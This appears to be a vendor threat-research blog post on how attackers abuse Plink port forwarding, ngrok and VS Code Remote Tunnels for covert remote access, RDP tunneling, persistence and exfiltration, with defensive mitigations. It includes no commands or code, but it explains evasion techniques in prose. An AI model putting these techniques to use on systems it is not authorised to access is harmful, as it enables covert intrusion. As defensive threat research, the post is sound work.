Webinar | Team Burned Out on Phishing Analysis? Here's How to Help.
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
June 25, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
Key Points
Protocol tunneling is a technique used to encapsulate one network protocol within another, allowing data to be transmitted through a secure or otherwise-allowed protocol. There are many legitimate use cases for protocol tunneling in enterprise environments. Tunneling protocols provide encryption and secure channels for data transmission, protecting sensitive information from unauthorized access. They also allow users to easily access remote resources and services to test, manage, and troubleshoot applications and systems.
On the other hand, threat actors often use this method to bypass network defenses and maintain covert command-and-control (C2) channels after compromising hosts within an environment. By encapsulating malicious traffic within commonly permitted protocols such as HTTP, Domain Name System (DNS), or SSH, attackers can evade firewalls, intrusion detection systems (IDS), and other security measures that might otherwise detect and block their activities. If these communication channels are not detected and remediated following an intrusion, the threat actor will not successfully be removed from the environment, allowing them to continue their attack.
The primary motivations for using protocol tunneling include evading security controls, blending malicious traffic with legitimate network traffic to avoid detection, maintaining persistent access to compromised systems, and enabling the covert exfiltration of sensitive data. The technique is often accomplished using legitimate tools designed for secure remote access and development purposes that are repurposed for malicious activities. Tools such as Plink and ngrok offer a simple way to establish tunnels; we have observed cybercriminals use these tools for intrusion in multiple ransomware and extortion attacks over the past few years. Additionally, ReliaQuest recently investigated a customer incident involving the use of a newer tunneling feature in Visual Studio Code (VS Code), a source code editor from Microsoft. This report—the first in a series on protocol tunneling—outlines why threat actors use protocol tunneling, explores common tools used to tunnel network traffic, and provides actionable recommendations to prevent the malicious use of these tools. Subsequent reports in this series will delve deeper into hunting for the presence of specific tools within networks.
Below are some of the ways and reasons that threat actors leverage tunneling protocols to bypass security controls and monitoring systems.
Bypassing Network Controls
Maintaining Stealth
Persistent Access
Data Exfiltration
Adding to the stealthy nature of this technique, tunneling can often be accomplished with tools designed for legitimate purposes such as secure remote access or code development and testing. While some threat actors use custom malware for tunneling traffic, other adversaries choose legitimate tools that camouflage their traffic as administrator activity, preventing detection. Below, we provide an overview of three commonly used tunneling protocol tools: Plink, ngrok, and VS Code.
Plink, a command-line interface (CLI) to the PuTTY backend, is a versatile tool designed for legitimate purposes such as secure remote access. Attackers can exploit its capabilities to establish covert communication channels and maintain control over compromised systems. By using Plink, threat actors can encapsulate other types of traffic within encrypted SSH tunnels, helping them bypass security controls.
How Threat Actors Use Plink
SSH tunnels using Plink are typically established using port forwarding, which is a technique used to redirect network traffic from one port to another, enabling secure communication between different network segments. Attackers exploit this functionality by using Plink to establish both local and remote port forwarding.
Local port forwarding and remote port forwarding are two methods used to redirect network traffic through an encrypted SSH tunnel, but they serve different purposes. Local port forwarding redirects traffic from a local port on the attacker’s machine to a specified destination on the target server. This is commonly used to access local services running on the target SSH server, or services running on other hosts in the same network segment.
In contrast, remote port forwarding redirects traffic from a port on a remote attacker-controlled server to a specified service on the client machine. This is the most common method we see attackers use, since it can be used to expose a local service on an internal machine to the outside world via the remote attacker server. For example, an attacker can set up remote port forwarding to forward traffic on their server to the RDP service on the target compromised machine. This can allow an attacker to RDP to an internal host behind a firewall that does not allow inbound RDP.
We have seen more than 200 mentions on dark web platforms of using Plink for port forwarding and to tunnel protocols like RDP. In one such post, for example, a forum user provided a tutorial on how to use “the Netcat shell and plink.exe” to “set up remote port forwarding from the victim’s system to my machine” to access remote desktop for a host behind a firewall in an internal network (quotations translated from Russian). They shared detailed steps and example commands to set up port forwarding to access the RDP service.
Mitigations
To perform port forwarding with Plink, the host must establish an outbound SSH connection. Create network policies using protocol aware firewall devices to block outbound SSH traffic for devices that do not need to communicate with external devices over SSH. Additionally, implement Group Policy Objects (GPOs) for Software Restriction Policies (SRP) in Active Directory (AD) to prevent the execution of Plink enterprise-wide if the tool is not legitimately used. Exceptions should be made for administrators and devices that require its use.
ngrok is a popular tool designed to create secure tunnels from a public endpoint to a local service, often used by developers to expose local servers to the internet for testing and development purposes. It works by providing a unique, publicly accessible URL that forwards traffic to a specified port on the local machine. While ngrok has many legitimate uses, attackers exploit its capabilities to bypass network controls and establish covert communication channels. The notorious cybercrime group “Scattered Spider” has used ngrok to establish persistent access in many intrusions, including an incident observed by ReliaQuest in November 2023.
How Threat Actors Use ngrok
By encapsulating traffic within commonly allowed protocols such as HTTP and HTTPS, ngrok can evade firewalls and intrusion detection systems that might otherwise block direct connections. Attackers use ngrok to quickly and easily create temporary, dynamic URLs that are difficult to track and block, allowing them to maintain remote control over compromised systems, exfiltrate data, and execute commands without raising alarms.
Similar to SSH tunneling, ngrok can make services on internal machines accessible through a firewall. The difference is that ngrok tunnels traffic through HTTP and HTTPS. Additionally, traffic is tunneled through ngrok’s global network of servers and accessed via dynamic URLs, removing the need for attackers to administer their own proxy. This can also make traffic harder to detect, especially if ngrok is used legitimately in an environment.
We have observed users on dark web forums suggest the use of ngrok to other users who are looking for a way to get remote access to internal services on a compromised host behind a firewall. One user, for instance, was seeking “a socks4 proxy type for connect to a local network with other devices.” The ReliaQuest Threat Research team has identified more than 400 posts on dark web platforms related to using ngrok to tunnel traffic for remote access. Additionally, some remote-access trojans (RAT) like XWorm and Anarchy Panel RAT are advertised as having built-in capabilities to install ngrok, indicating it is a popular tool for facilitating remote access.
While ngrok can be used for various purposes, we most often see it used to access RDP and gain remote access on compromised hosts. By installing ngrok on a compromised host and configuring it for RDP port 3389, an attacker can establish a remote session on internal clients within a network. Alternatively, ngrok might be used to tunnel access for a Virtual Network Computing (VNC) connection—a graphical desktop-sharing technology that uses the Remote Frame Buffer protocol to provide RDP-like control over another computer. Threat actors may choose to install a VNC server on a compromised host and then use ngrok to make that server accessible, granting them remote access.
ngrok uses a network of servers that relay traffic to the upstream service running on the client. Create network policies in the environment to block traffic to the following domains.
Additionally, implement GPOs for SRP in AD to prevent the execution of ngrok. Create exceptions for these network and host controls to allow hosts or users that use the software to serve a legitimate business function.
VS Code has become a cornerstone in the modern developer’s toolkit, celebrated for its versatility and broad extension library. Many enterprises and consumers alike have relied on its convenience. One of these conveniences can be found in VS Code’s tunneling ability, Remote Tunnels. VS Code Remote Tunnels is a feature crafted to elevate the remote development experience by enabling secure and seamless connections to remote machines via Microsoft dev tunnels, essentially integrating local and remote workflows. While primarily aimed at legitimate use cases such as remote debugging, code navigation, and collaborative development, Remote Tunnels can be leveraged by malicious actors to establish covert communication channels and maintain persistent access to compromised systems.
How Threat Actors Use VS Code Remote Tunnels
Leveraging the VS Code CLI, attackers can initiate tunnels authenticated through GitHub, effectively bypassing traditional security defenses due to the signed and trusted nature of the VS Code binary. This tunnel establishes an encrypted connection over HTTPS and essentially provides reverse shell access to an internal host. With this access, an attacker can execute commands, navigate the file system, and even exfiltrate data from the remote machine with minimal detection risk. The legitimate appearance of the VS Code binary enables it to evade detection mechanisms that would normally catch malicious tunnel abuse, such as static detections, antivirus software, or EDR.
Moreover, the tunneled traffic is routed through Microsoft’s domains, such as visualstudio.com, blending seamlessly with legitimate traffic and complicating the detection of malicious activities. Attackers can exploit this feature to establish a reverse shell, granting them extensive control over the target system without raising immediate alarms. While VS Code Remote Tunnels is currently not as prevalent a tool as Plink and ngrok, and we have yet not seen its use mentioned on criminal forums, ReliaQuest has observed malicious VS Code tunneling for remote shell access in a recent incident. Given the trusted nature of the software, it is likely that use of this technique could increase in the future.
Similar to ngrok, VS Code Remote Tunnels uses cloud-hosted servers to relay traffic to the client machine. Create network policies in the environment to block traffic to the following domains.
Additionally, GPOs can be configured to control access to Dev Tunnels, including the ability to disable the service. Refer to documentation from Microsoft to create policies to disable Dev Tunnels Windows hosts in the environment. Create exceptions for these network and host controls to allow hosts or users that use the feature for a legitimate business function.
Protocol tunneling has proven to be an effective technique used by threat actors to secure remote access to internal network clients. We predict, with high confidence, that the use of protocol tunneling tools will not decrease in the long term. Tools like ngrok and Plink have been used by threat actors for years and offer an easily deployable means to evade detection and establish persistent access to compromised systems. The growing adoption of encrypted traffic and the ubiquitous use of cloud services also provide a fertile ground for these tools to operate undetected. Additionally, the relatively new tunnel feature in VS Code offers arguably an even stealthier way to establish remote access. Because the software benefits from the trusted nature of Microsoft products, it is likely that its abuse will become more popular among threat actors.
To identify suspicious tunnelling, ReliaQuest offers the detection rules. These rules will alert defenders to suspicious activity related to protocol tunnelling. To remediate suspicious activity, associated GreyMatter Respond Plays can be executed by ReliaQuest customers or by the ReliaQuest team on a customer’s behalf.
The ReliaQuest Threat Research team offers the following inexhaustive list of recommendations and best practices to establish a secure foundation against the threats and tactics, techniques, and procedures (TTPs) mentioned in this report.
Get a live demo of our security operations platform, GreyMatter, and learn how you can improve visibility, reduce complexity, and manage risk in your organization.